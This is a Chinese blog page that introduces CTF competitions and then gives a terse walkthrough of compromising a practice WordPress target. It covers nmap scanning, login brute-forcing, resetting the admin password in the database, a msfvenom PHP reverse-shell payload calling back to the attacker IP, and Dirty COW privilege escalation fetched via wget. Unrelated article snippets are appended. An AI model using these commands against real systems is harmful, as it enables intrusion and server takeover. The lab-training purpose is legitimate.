CTF(Capture The Flag)
CTF起源于1996年DEFCON全球黑客大会,以替代之前黑客们通过互相发起真实攻击进行技术比拼的方式。
国际知名CTF赛事:
其中,DEFCON CTF及具影响力认可度非常高。
CTF赛事 :XCTF联赛
红帽杯
网络安全的学习非常需要实践来促进,而真实环境不具备这样的条件,CTF恰恰是一种锻炼和学习信息安全技术的训练场。
CTF 近期在国内的发展非常迅猛,认可度也非常高,这证明了CTF存在的合理性和必要性。
国家层面,通过CTF比赛,可以以赛代练,培养出一批国内优秀的网络安全人才。
企业层面,通过CTF比赛,可以更好练兵,让相关信息安全部门的人员,有效的提高安全意识,持续学习安全技能。
解题模式(Jeopardy):线上赛
攻防模式(Attack-Defense)
混合模式(Mix)
Reverse(逆向工程)
Pwn(破解)
Web(Web安全)
CryPto(加解密)
Misc(杂项)
Mobile(移动安全)
怎么判断题目是否在能力范围内?
网站链接
第三届红帽杯题目为例
网络空间环境瞬息万变,其复杂性和专业性对网络安全人才也提出了更高要求,政府、企业、高校都在积极创新网络安全人才培养机制。作为改革开放的排头兵和先行地,广东省互联网呈现网络基础好、规模大、发展快、生态完善、前景广阔的特征,与此同时,广东省亦是遭受网络攻击的重灾区。为此,广东省分别以人才和技术为核心进行探索,积极构筑全方位的网络安全防线。
赛制全新升级,网络靶场内上演实战演习
本次决赛在往年“红帽杯”的基础上进行了赛制的全新升级,大赛聚焦关键信息基础设施的典型漏洞及风险,通过在平行仿真的网络靶场中,将现实网络空间的威胁斗争映射成赛场上激烈的攻防博弈,全面考核参赛队伍的漏洞发现、漏洞挖掘、漏洞修复、应急响应以及即时策略的综合能力,在高仿真、全场景的网络靶场中,全方位验证和提升选手实战能力。
靶场下载:
Tips:首次打开虚拟机时,要选择“我已移动该虚拟机”选项
渗透工具:Kail Linux
主机发现
arp-scan
、netdiscover
、fping
等工具。端口扫描
nmap -sS -sV -p- -v -T4 靶机IP
。参数说明:
-p 1-65535
)威胁建模
靶机开放端口及对应服务:
用Chrome浏览器访问靶机,通过Wappalyzer插件获得信息:
目录扫描
后台访问
1.手工尝试:
2.后台访问 - phpmyadmin爆破工具
3.后台访问 - Burp爆破
修改管理员密码
wordpress
数据库中找到wp_user
表select * from 'wp_users'
update wp_users set user_pass=md5('123456') where user_login='cleverbao';
登录后台
修改数据库字段
生成shell 方法1
msfvenom -p php/meterpreter/reverse_tcp LHOST=Kail的IP LPORT=4444 -o Desktop/shell.php
生成shell 方法2
上传shell
获取shell
参数说明:
查看权限
漏洞概述
脏牛(Dirty COW)提权
原理:
官方发出的一个exp:
https://github.com/FireFart/dirtycow/blob/master/dirty.c
代码执行
gcc-pthread dirty.c -o dirty -lcrypt
chmod +x dirty
python -m SimpleHTTPSercer 80
wget http://kail的IP地址/dirty
。./dirty new_password(任意密码)
。文章浏览阅读1k次。虚拟机和容器技术都可以看作是沙箱的不同表现。虚拟机和容器。前者是对硬件的虚拟化,后者则更像是操作系统的虚拟化。两者都提供了沙箱的能力:虚拟机通过硬件级抽象提供,而容器则使用公共内核提供进程级的隔离。_docker和sandbox
文章浏览阅读4.9w次,点赞7次,收藏11次。有位用户在使用PR模板制作视频时,遇到PR导出出错的问题,问题描述:编译影片时出错,加速渲染器错误”(如下图所示)编译影片时出错。GPU渲染错误无法处理帧。这部分因视频内容不同而出错提示不同,所以省略…组件EfedFillert类型 GPU视频滤镜选择器:9错误代码:-1609629695于是亲测该PR模板:PR模板 卖房售房租房酒店促销等产品幻灯片展示PR视频模板找到了解决办法。如果你也遇到同样问题,可以尝试下面的方法哦。1、点击菜单“文件”,选则“项目设置”,点击“常规”。如._-1609629695
文章浏览阅读4k次,点赞6次,收藏5次。将 Anaconda3 的路径添加到环境变量中,在cmd先运行activate root 在运行jupyter notebook。_jupyter notebook 导入库 报错 importerror: dll load failed while importing _a
文章浏览阅读50次。Spring Cloud Stream Application Starters are standalone executable applications that communicate over messaging middleware such as Apache Kafka and RabbitMQ. These applications can run independently o...
文章浏览阅读1.5w次。 手机专业名词详解 专业名词详解... 11、 手机制式... 61.1 GSM.. 61.2 CDMA. 61.3 3G.. 71.4 W-CDMA. 71.5 CDMA2000. 71.6 TD-SCDMA. 71._手机行业专业术语
文章浏览阅读1.3k次。项目需要做一个简单的播放视频功能demo,考虑到需求较简单(实现不超过2min的MP4格式短视频播放),所以就没考虑使用复杂的第三方视频库了。最初敲定使用系统原生的VideoView实现,后来发现不能在列表中使用普通的VideoView 。VideoView 继承自SurfaceView,而SurfaceView并没有UI同步缓冲区。这就导致了在列表滚动的时候,正在播放的视频可能无法跟上滚动的_texttureview mediaplayer
文章浏览阅读7k次,点赞15次,收藏132次。GD32串口 、YMODEM 、IAP升级_ymodem工具
文章浏览阅读1.1w次,点赞3次,收藏27次。常用网站签到本地/云函数/青龙脚本( 人人视频|刺猬猫小说|Acfun|WPS| 时光相册|书香门第论坛|绅士领域|好游快爆|埋堆堆|多看阅读|一亩三分地|闪艺app|香网小说|晋江|橙光|什么值得买|网易蜗牛读书|网易云游戏平台|龙空论坛|NGA论坛|csdn|mt论坛|sf轻小说|猫耳FM|联想智选app|联想智选联想延保|联动云租车|数码之家|玩物志好物商店|togamemod|好书友论坛|鱼C论坛|帆软社区|村花论坛|纪录片之家|富贵论坛|ug爱好者|阅次元论坛|菜鸟图库|魅族社区|经管之家|有分享_微博超话签到 青龙面板
文章浏览阅读2.2k次。 tx2内部集成了can控制器,用的是Bosch的芯片。can的驱动在tx2内核中被注册为网络设备也就是socket can,说到这里相信很多人已经猜到了驱动的大致架构,下面记录了我分析驱动的过程。 首先该驱动还是遵循platform架构,所以我们这里就直接进入到probe函数了。static int mttcan_probe(struct platform_devic..._mttcan
文章浏览阅读1k次。1. 字典(dict)dict = {‘name’: ‘Zara’, ‘age’: 7, ‘class’: ‘First’}1.1 字典---字符串print (type(str(dict)), str(dict))结果如下<class 'str'> {'name': 'Zara', 'age': 7, 'class': 'First'}1.2 字典---元组p..._tubles 转为 dict
文章浏览阅读3.4k次,点赞3次,收藏8次。springboot的Profile(用于快速切换开发环境),涉及到profile的加载顺序,list值的覆盖,map元素的添加_springboot profiles
文章浏览阅读751次。决策树是一种树形分类模型,每个非叶子结点相当于if条件语句,通过逐个判定特征所属类别进行分类。那么,决策树模型具体是如何实现的?_决策树输出值只有0.0几,泛化能力怎么样